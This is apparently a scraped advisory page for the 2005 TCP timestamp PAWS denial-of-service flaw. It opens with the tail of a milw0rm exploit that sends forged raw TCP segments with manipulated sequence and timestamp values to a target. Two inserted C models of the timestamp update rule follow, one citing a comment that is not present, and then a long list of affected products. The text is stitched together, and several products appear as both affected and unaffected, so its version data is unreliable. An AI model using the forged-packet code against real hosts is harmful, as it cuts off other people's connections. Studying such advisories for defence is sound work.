if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) == -1) {
perror("setsockopt");
close(sock);
return (1);
}

seq = arc4random();
ts = arc4random();
if (send_tcp(sock, saddr, daddr, sport, dport, seq, ts) ||
send_tcp(sock, saddr, daddr, sport, dport, seq, op(ts)) ||
send_tcp(sock, saddr, daddr, sport, dport, op(seq), ts) ||
send_tcp(sock, saddr, daddr, sport, dport, op(seq), op(ts))) {
fprintf(stderr, "failed\n");
close(sock);
return (1);
}

close(sock);
printf("done\n");
return (0);
}

// milw0rm.com [2005-05-21]
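
The TS.Recent update rule discussed in the comment above, modeled in user space as an added example (not part of the original advisory or of any kernel source): one constructed off-window segment and one genuine segment are run through the update the comment attributes to OpenBSD and FreeBSD, and through the corrected check. The struct and function names and the sample values are assumptions of this model; SYN/FIN length accounting is omitted, and `ts_recent == 0` is taken to mean "TS.Recent not valid".

```c
#include <stdint.h>
#include <stdio.h>

/* Modular 32-bit comparisons, in the style of the macros quoted above. */
#define SEQ_LEQ(a, b)   ((int32_t)((a) - (b)) <= 0)
#define TSTMP_LT(a, b)  ((int32_t)((a) - (b)) < 0)
#define TSTMP_GEQ(a, b) ((int32_t)((a) - (b)) >= 0)

enum verdict { SEG_PASSED, SEG_DROPPED_BY_PAWS };
enum variant { UPDATE_VULNERABLE, UPDATE_FIXED };

/* Receiver-side state, reduced to what the PAWS logic needs. */
struct conn {
    uint32_t ts_recent;     /* TS.Recent; 0 = not valid (model assumption) */
    uint32_t last_ack_sent; /* Last.ACK.sent */
};

struct seg {
    uint32_t seq;   /* SEG.SEQ */
    uint32_t len;   /* SEG.LEN */
    uint32_t tsval; /* SEG.TSval */
};

static enum verdict
receive_segment(struct conn *c, const struct seg *s, enum variant v)
{
    /* RFC 1323 4.2.1 R1: drop segments older than a valid TS.Recent. */
    if (c->ts_recent != 0 && TSTMP_LT(s->tsval, c->ts_recent))
        return SEG_DROPPED_BY_PAWS;

    if (v == UPDATE_VULNERABLE) {
        /* Only the left edge is tested, so any segment starting in the
         * half of sequence space "before" Last.ACK.sent is trusted. */
        if (SEQ_LEQ(s->seq, c->last_ack_sent))
            c->ts_recent = s->tsval;
    } else {
        /* Corrected check quoted on the page: the segment must also
         * reach Last.ACK.sent, otherwise TS.Recent is invalidated. */
        if (TSTMP_GEQ(s->tsval, c->ts_recent) &&
            SEQ_LEQ(s->seq, c->last_ack_sent)) {
            if (SEQ_LEQ(c->last_ack_sent, s->seq + s->len))
                c->ts_recent = s->tsval;
            else
                c->ts_recent = 0;
        }
    }
    return SEG_PASSED;
}

/*
 * Feeds one off-window segment with a far-future TSval, then the real
 * peer's next segment. Returns 1 if the genuine segment still passes
 * PAWS, and reports TS.Recent as it stood after the first segment.
 */
int
genuine_segment_survives(enum variant v, uint32_t *ts_recent_after_bogus)
{
    struct conn c = { .ts_recent = 1000, .last_ack_sent = 5000 };
    /* constructed: starts 2^30 before Last.ACK.sent, carries no data */
    struct seg bogus = { .seq = 5000u - 0x40000000u, .len = 0,
                         .tsval = 1000u + 0x70000000u };
    /* constructed: the peer's next in-order segment */
    struct seg genuine = { .seq = 5000, .len = 100, .tsval = 1001 };

    receive_segment(&c, &bogus, v);
    *ts_recent_after_bogus = c.ts_recent;
    return receive_segment(&c, &genuine, v) == SEG_PASSED;
}

int
main(void)
{
    uint32_t ts;
    int ok;

    ok = genuine_segment_survives(UPDATE_VULNERABLE, &ts);
    printf("vulnerable: ts_recent=%u genuine segment %s\n",
        (unsigned)ts, ok ? "passed" : "dropped by PAWS");

    ok = genuine_segment_survives(UPDATE_FIXED, &ts);
    printf("fixed:      ts_recent=%u genuine segment %s\n",
        (unsigned)ts, ok ? "passed" : "dropped by PAWS");
    return 0;
}
```

In the corrected variant the off-window segment leaves TS.Recent at 0, so the next genuine segment skips the PAWS comparison and re-establishes a sane value.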
		

- Vulnerability Information

16685
Multiple Vendor Malformed TCP Timestamp Handling Remote DoS
Denial of Service
Loss of Availability

- Vulnerability Description

- Timeline

2005-05-18 Unknown
2005-05-21 Unknown

- Solution

Products

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Multiple Vendor TCP Timestamp PAWS Remote Denial Of Service Vulnerability
Design Error 13676
Yes No
2005-05-18 12:00:00 2006-05-17 11:29:00
Noritoshi Demizu is credited with the discovery of this vulnerability.

- Affected Program Versions

Yamaha RTX2000
Yamaha RTX1500
Yamaha RTX1100
Yamaha RTX1000
Yamaha RTV700
Yamaha RT57i
Yamaha RT300i
Yamaha RT250i
Yamaha RT105
SCO Unixware 7.1.4
SCO Unixware 7.1.3
SCO Open Server 6.0
OpenBSD OpenBSD 3.6
OpenBSD OpenBSD 3.5
OpenBSD OpenBSD 3.4
OpenBSD OpenBSD 3.3
OpenBSD OpenBSD 3.2
OpenBSD OpenBSD 3.1
OpenBSD OpenBSD 3.0
Nortel Networks WLAN Access Point 7250.0
Nortel Networks WLAN Access Point 7220.0
Nortel Networks Universal Signaling Point Compact/Lite
Nortel Networks Universal Signaling Point 5200
Nortel Networks SRG 1.0
Nortel Networks Optical Metro 5200
Nortel Networks Optical Metro 5100
Nortel Networks Optical Metro 5000
Nortel Networks Ethernet Routing Switch 1648
Nortel Networks Ethernet Routing Switch 1624
Nortel Networks Ethernet Routing Switch 1612
Nortel Networks Contact Center
Nortel Networks Communications Server 1000
Nortel Networks CallPilot 703t
Nortel Networks CallPilot 702t
Nortel Networks CallPilot 201i
Nortel Networks CallPilot 200i
Nortel Networks BCM 400
Nortel Networks BCM 200
Nortel Networks BCM 1000
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Embedded SP1
Microsoft Windows XP Embedded
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
IETF RFC 1323 : TCP Extensions for High Performance
Hitachi GS4000
Hitachi GR4000
Hitachi GR3000
Hitachi AlaxalA AX
FreeBSD FreeBSD 5.4 -RELENG
FreeBSD FreeBSD 5.4 -RELEASE
FreeBSD FreeBSD 5.4 -PRERELEASE
FreeBSD FreeBSD 5.3 -STABLE
FreeBSD FreeBSD 5.3 -RELENG
FreeBSD FreeBSD 5.3 -RELEASE
FreeBSD FreeBSD 5.3
FreeBSD FreeBSD 5.2.1 -RELEASE
FreeBSD FreeBSD 5.2 -RELENG
FreeBSD FreeBSD 5.2 -RELEASE
FreeBSD FreeBSD 5.2
FreeBSD FreeBSD 5.1 -RELENG
FreeBSD FreeBSD 5.1 -RELEASE/Alpha
FreeBSD FreeBSD 5.1 -RELEASE-p5
FreeBSD FreeBSD 5.1 -RELEASE
FreeBSD FreeBSD 5.1
FreeBSD FreeBSD 5.0 -RELENG
FreeBSD FreeBSD 5.0 -RELEASE-p14
FreeBSD FreeBSD 5.0 alpha
FreeBSD FreeBSD 5.0
FreeBSD FreeBSD 4.11 -STABLE
FreeBSD FreeBSD 4.11 -RELENG
FreeBSD FreeBSD 4.11 -RELEASE-p3
FreeBSD FreeBSD 4.10 -RELENG
FreeBSD FreeBSD 4.10 -RELEASE-p8
FreeBSD FreeBSD 4.10 -RELEASE
FreeBSD FreeBSD 4.10
FreeBSD FreeBSD 4.9 -RELENG
FreeBSD FreeBSD 4.9 -PRERELEASE
FreeBSD FreeBSD 4.9
FreeBSD FreeBSD 4.8 -RELENG
FreeBSD FreeBSD 4.8 -RELEASE-p7
FreeBSD FreeBSD 4.8 -PRERELEASE
FreeBSD FreeBSD 4.8
FreeBSD FreeBSD 4.7 -STABLE
FreeBSD FreeBSD 4.7 -RELENG
FreeBSD FreeBSD 4.7 -RELEASE-p17
FreeBSD FreeBSD 4.7 -RELEASE
FreeBSD FreeBSD 4.7
FreeBSD FreeBSD 4.6.2
FreeBSD FreeBSD 4.6 -STABLE
FreeBSD FreeBSD 4.6 -RELENG
FreeBSD FreeBSD 4.6 -RELEASE-p20
FreeBSD FreeBSD 4.6 -RELEASE
FreeBSD FreeBSD 4.6
FreeBSD FreeBSD 4.5 -STABLEpre2002-03-07
FreeBSD FreeBSD 4.5 -STABLE
FreeBSD FreeBSD 4.5 -RELENG
FreeBSD FreeBSD 4.5 -RELEASE-p32
FreeBSD FreeBSD 4.5 -RELEASE
FreeBSD FreeBSD 4.5
FreeBSD FreeBSD 4.4 -STABLE
FreeBSD FreeBSD 4.4 -RELENG
FreeBSD FreeBSD 4.4 -RELENG
FreeBSD FreeBSD 4.4 -RELEASE-p42
FreeBSD FreeBSD 4.4
FreeBSD FreeBSD 4.3 -STABLE
FreeBSD FreeBSD 4.3 -RELENG
FreeBSD FreeBSD 4.3 -RELEASE-p38
FreeBSD FreeBSD 4.3 -RELEASE
FreeBSD FreeBSD 4.3
FreeBSD FreeBSD 4.2 -STABLEpre122300
FreeBSD FreeBSD 4.2 -STABLEpre050201
FreeBSD FreeBSD 4.2 -STABLE
FreeBSD FreeBSD 4.2 -RELEASE
FreeBSD FreeBSD 4.2
FreeBSD FreeBSD 4.1.1 -STABLE
FreeBSD FreeBSD 4.1.1 -RELEASE
FreeBSD FreeBSD 4.1.1
FreeBSD FreeBSD 4.1
FreeBSD FreeBSD 4.0 .x
FreeBSD FreeBSD 4.0 -RELENG
FreeBSD FreeBSD 4.0 alpha
FreeBSD FreeBSD 4.0
FreeBSD FreeBSD 3.5.1 -STABLEpre2001-07-20
FreeBSD FreeBSD 3.5.1 -STABLE
FreeBSD FreeBSD 3.5.1 -RELEASE
FreeBSD FreeBSD 3.5.1
FreeBSD FreeBSD 3.5 x
FreeBSD FreeBSD 3.5 -STABLEpre122300
FreeBSD FreeBSD 3.5 -STABLEpre050201
FreeBSD FreeBSD 3.5 -STABLE
FreeBSD FreeBSD 3.5
FreeBSD FreeBSD 3.4 x
FreeBSD FreeBSD 3.4
FreeBSD FreeBSD 3.3 x
FreeBSD FreeBSD 3.3
FreeBSD FreeBSD 3.2 x
FreeBSD FreeBSD 3.2
FreeBSD FreeBSD 3.1 x
FreeBSD FreeBSD 3.1
FreeBSD FreeBSD 3.0 -RELENG
FreeBSD FreeBSD 3.0
FreeBSD FreeBSD 2.2.8
FreeBSD FreeBSD 2.2.6
FreeBSD FreeBSD 2.2.5
FreeBSD FreeBSD 2.2.4
FreeBSD FreeBSD 2.2.3
FreeBSD FreeBSD 2.2.2
FreeBSD FreeBSD 2.2 x
FreeBSD FreeBSD 2.2
FreeBSD FreeBSD 2.1.7 .1
FreeBSD FreeBSD 2.1.6 .1
FreeBSD FreeBSD 2.1.6
FreeBSD FreeBSD 2.1.5
FreeBSD FreeBSD 2.1 x
FreeBSD FreeBSD 2.1
FreeBSD FreeBSD 2.0.5
FreeBSD FreeBSD 2.0
FreeBSD FreeBSD 1.1.5 .1
FreeBSD FreeBSD 4.10-PRERELEASE
FreeBSD FreeBSD 3.x
FreeBSD FreeBSD 2.x
FreeBSD FreeBSD -current
F5 BigIP 9.0.5
F5 BigIP 9.0.4
F5 BigIP 9.0.3
F5 BigIP 9.0.2
F5 BigIP 9.0.1
F5 BigIP 9.0
F5 BigIP 4.6.2
F5 BigIP 4.6
F5 BigIP 4.5.12
F5 BigIP 4.5.11
F5 BigIP 4.5.10
F5 BigIP 4.5.9
F5 BigIP 4.5.6
F5 BigIP 4.5
F5 BigIP 4.4
F5 BigIP 4.3
F5 BigIP 4.2
F5 BigIP 4.0
Cisco Web Collaboration Option
Cisco Unity Server 4.0
Cisco Unity Server 3.3
Cisco Unity Server 3.2
Cisco Unity Server 3.1
Cisco Unity Server 3.0
Cisco Unity Server 2.46
Cisco Unity Server 2.4
Cisco Unity Server 2.3
Cisco Unity Server 2.2
Cisco Unity Server 2.1
Cisco Unity Server 2.0
Cisco Unity Server
Cisco Support Tools
Cisco SN5400 series storage routers
Cisco SN 5428 Storage Router SN5428-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-3.3.1-K9
Cisco SN 5428 Storage Router SN5428-3.2.2-K9
Cisco SN 5428 Storage Router SN5428-3.2.1-K9
Cisco SN 5428 Storage Router SN5428-2.5.1-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.1-K9
Cisco SN 5420 Storage Router 1.1.3
Cisco SN 5420 Storage Router 1.1 (7)
Cisco SN 5420 Storage Router 1.1 (5)
Cisco SN 5420 Storage Router 1.1 (4)
Cisco SN 5420 Storage Router 1.1 (3)
Cisco SN 5420 Storage Router 1.1 (2)
Cisco Secure ACS Solution Engine 3.3.2
Cisco Secure ACS Solution Engine 3.3.1
Cisco Secure ACS Solution Engine 3.3
Cisco Secure ACS Solution Engine
Cisco Secure ACS for Windows Server 3.2
Cisco Secure ACS for Windows NT 3.1.1
Cisco Secure ACS for Windows NT 3.0.3
Cisco Secure ACS for Windows NT 3.0 .1
Cisco Secure ACS for Windows NT 3.0
Cisco Secure ACS for Windows NT 2.42
Cisco Secure ACS for Windows NT 2.6.4
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Cisco Secure ACS for Windows NT 2.6.3
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Cisco Secure ACS for Windows NT 2.6.2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Cisco Secure ACS for Windows NT 2.6
Cisco Secure ACS for Windows NT 2.5
Cisco Secure ACS for Windows NT 2.4
Cisco Secure ACS for Windows NT 2.3
Cisco Secure ACS for Windows NT 2.1
Cisco Secure ACS for Unix 2.3.6 .1
Cisco Secure ACS for Unix 2.3.5 .1
Cisco Secure ACS for Unix 2.3
Cisco Secure ACS for Unix 2.0
Cisco Secure Access Control Server 3.3.2
Cisco Secure Access Control Server 3.3.1
Cisco Secure Access Control Server 3.3 (1)
Cisco Secure Access Control Server 3.3
Cisco Secure Access Control Server 3.2.2
Cisco Secure Access Control Server 3.2.1
Cisco Secure Access Control Server 3.2 (3)
Cisco Secure Access Control Server 3.2 (2)
Cisco Secure Access Control Server 3.2 (1.20)
Cisco Secure Access Control Server 3.2 (1)
Cisco Secure Access Control Server 3.2
Cisco Secure Access Control Server 3.1
Cisco Secure Access Control Server 3.0
Cisco Secure Access Control Server
Cisco Remote Monitoring Suite Option
Cisco Personal Assistant 1.4 (2)
Cisco Personal Assistant 1.4 (1)
Cisco Personal Assistant 1.3 (4)
Cisco Personal Assistant 1.3 (3)
Cisco Personal Assistant 1.3 (2)
Cisco Personal Assistant 1.3 (1)
Cisco Personal Assistant
Cisco MGX 8250 1.2.11
Cisco MGX 8250 1.2.10
Cisco MGX 8230 1.2.11
Cisco MGX 8230 1.2.10
Cisco MGX
Cisco MeetingPlace
Cisco IP Contact Center Express
Cisco IP Contact Center Enterprise
Cisco Interactive Voice Response
Cisco Intelligent Contact Manager 5.0
Cisco Intelligent Contact Manager
Cisco Emergency Responder 1.1
Cisco Emergency Responder
Cisco E-Mail Manager
Cisco CSS11800 Content Services Switch
Cisco CSS11506 Content Services Switch
Cisco CSS11503 Content Services Switch
Cisco CSS11501 Content Services Switch
Cisco CSS11500 Content Services Switch 7.30 (00.09)S
Cisco CSS11500 Content Services Switch 7.30 (00.08)S
Cisco CSS11500 Content Services Switch 7.20 (03.10)S
Cisco CSS11500 Content Services Switch 7.20 (03.09)S
Cisco CSS11500 Content Services Switch 7.10 (05.07)S
Cisco CSS11500 Content Services Switch
Cisco CSS11150 Content Services Switch
Cisco CSS11050 Content Services Switch
Cisco CSS11000 Content Services Switch
Cisco Conference Connection 1.2
Cisco Conference Connection 1.1 (1)
Cisco Conference Connection
Cisco CiscoWorks Windows/WUG 0
Cisco CiscoWorks Windows 0
Cisco CiscoWorks Windows
Cisco CiscoWorks VPN/Security Management Solution
Cisco CiscoWorks LMS 1.3
Cisco CiscoWorks Common Services 2.2
Cisco CiscoWorks Common Management Foundation 2.2
Cisco CiscoWorks Common Management Foundation 2.1
Cisco CiscoWorks Common Management Foundation 2.0
Cisco CiscoWorks CD1 5th Edition
Cisco CiscoWorks CD1 4th Edition
Cisco CiscoWorks CD1 3rd Edition
Cisco CiscoWorks CD1 2nd Edition
Cisco CiscoWorks CD1 1st Edition
Cisco CiscoWorks Access Control List Manager 1.6
Cisco CiscoWorks Access Control List Manager 1.5
Cisco CiscoWorks 1105 Wireless LAN Solution Engine
Cisco CiscoWorks 1105 Hosting Solution Engine
Cisco CiscoWorks
Cisco Call Manager 4.0
Cisco Call Manager 3.3 (3)
Cisco Call Manager 3.3
Cisco Call Manager 3.2
Cisco Call Manager 3.1 (3a)
Cisco Call Manager 3.1 (2)
Cisco Call Manager 3.1
Cisco Call Manager 3.0
Cisco Call Manager 2.0
Cisco Call Manager 1.0
Cisco Call Manager
Cisco AP350
Cisco AP1200
Cisco Agent Desktop
Blue Coat Systems SGOS
Blue Coat Systems CacheOS
Avaya Intuity Audix R5 0
Avaya Intuity AUDIX
Avaya Interactive Response 1.3
Avaya Interactive Response 1.2.1
Avaya Interactive Response
Avaya CVLAN
ALAXALA Networks AX7800S
ALAXALA Networks AX7800R
ALAXALA Networks AX5400S
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Professional SP2
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Home SP2
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition SP1
F5 BigIP 9.1
F5 BigIP 4.6.3
F5 BigIP 4.5.13
Cisco PIX OS
Cisco IOS XR
Cisco IOS 0
Cisco CatOS

- Unaffected software versions

Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Professional SP2
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Home SP2
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition SP1
F5 BigIP 9.1
F5 BigIP 4.6.3
F5 BigIP 4.5.13
Cisco PIX OS
Cisco IOS XR
Cisco IOS 0
Cisco CatOS

- Vulnerability discussion

A denial-of-service vulnerability exists in TCP as extended by RFC 1323. The issue resides in the Protection Against Wrapped Sequence Numbers (PAWS) technique, which was included to increase overall TCP performance.

When TCP 'timestamps' are enabled, both hosts at the endpoints of a TCP connection employ internal clocks to mark TCP headers with a 'timestamp' value.

When TCP PAWS is configured to employ timestamp values, this functionality exposes TCP PAWS implementations to a denial-of-service vulnerability.

The issue manifests if an attacker transmits a sufficient TCP PAWS packet to a vulnerable computer. The attacker sets a large value as the packet timestamp. When the target computer processes this packet, its internal timer is updated to the large value that the attacker supplied. All valid packets received after the attack are then dropped, because they are deemed to be too old or invalid. This type of attack effectively denies service for the targeted connection.
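The receiver-side behaviour described above, as a simplified C model added here for illustration (it is not code from the original page or from any vendor's TCP stack). The struct and function names, the sample values, and the stricter update rule on the `strict` path (the stored timestamp is only updated from a segment that covers the next expected sequence number) are assumptions.

```c
#include <stdbool.h>
#include <stdint.h>

/* Wrap-safe comparisons for 32-bit sequence numbers and timestamps. */
#define MOD_LT(a, b)  ((int32_t)((uint32_t)(a) - (uint32_t)(b)) < 0)
#define MOD_LEQ(a, b) ((int32_t)((uint32_t)(a) - (uint32_t)(b)) <= 0)

struct conn {               /* hypothetical, minimal receiver state */
    uint32_t rcv_nxt;       /* next expected sequence number (== last ACK sent) */
    uint32_t rcv_wnd;       /* receive window size */
    uint32_t ts_recent;     /* TS.Recent: the timestamp PAWS compares against */
};

struct seg { uint32_t seq, len, tsval; };

static bool in_window(const struct conn *c, const struct seg *s) {
    return MOD_LEQ(c->rcv_nxt, s->seq) && MOD_LT(s->seq, c->rcv_nxt + c->rcv_wnd);
}

/* Process one segment; returns true if its data is accepted.
 * strict == false: ts_recent is updated from any segment that starts at or
 *                  before rcv_nxt, before the segment itself is validated.
 * strict == true:  the segment must also cover rcv_nxt, so stale or
 *                  out-of-window segments cannot move ts_recent. */
bool tcp_receive(struct conn *c, const struct seg *s, bool strict) {
    if (MOD_LT(s->tsval, c->ts_recent))
        return false;                       /* PAWS: looks too old, drop */
    bool starts_before = MOD_LEQ(s->seq, c->rcv_nxt);
    bool covers_ack = MOD_LEQ(c->rcv_nxt, s->seq + s->len);
    if (starts_before && (!strict || covers_ack))
        c->ts_recent = s->tsval;
    if (!in_window(c, s))
        return false;                       /* sequence number not acceptable */
    c->rcv_nxt += s->len;
    return true;
}

/* Constructed scenario: one forged segment with a stale sequence number and a
 * far-future timestamp, then one genuine in-order segment. Returns whether
 * the genuine segment is still accepted afterwards. */
bool genuine_survives(bool strict) {
    struct conn c = { .rcv_nxt = 100000, .rcv_wnd = 65535, .ts_recent = 5000 };
    struct seg forged  = { .seq = 50000,  .len = 10,  .tsval = 5000 + 0x40000000u };
    struct seg genuine = { .seq = 100000, .len = 100, .tsval = 5001 };
    (void)tcp_receive(&c, &forged, strict);
    return tcp_receive(&c, &genuine, strict);
}
```

In the non-strict path the forged segment is itself discarded, yet it has already overwritten `ts_recent`, which is why every later genuine segment fails the PAWS test.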

- Exploit

A proof-of-concept exploit is provided by Daniel Hartmeier <daniel@benzedrine.cx>.

- Solution


Please see the referenced advisories for further information.


FreeBSD FreeBSD 4.0 alpha

FreeBSD FreeBSD 4.1.1 -STABLE

FreeBSD FreeBSD 4.11 -RELEASE-p3

FreeBSD FreeBSD 4.3 -STABLE

FreeBSD FreeBSD 4.3 -RELENG

FreeBSD FreeBSD 4.4 -RELENG

FreeBSD FreeBSD 4.4 -RELEASE-p42

FreeBSD FreeBSD 4.6 -RELEASE-p20

FreeBSD FreeBSD 4.6 -RELENG

FreeBSD FreeBSD 4.8 -PRERELEASE

FreeBSD FreeBSD 4.8

FreeBSD FreeBSD 5.1 -RELEASE/Alpha

FreeBSD FreeBSD 5.2 -RELENG

SCO Unixware 7.1.4

- References

 

 
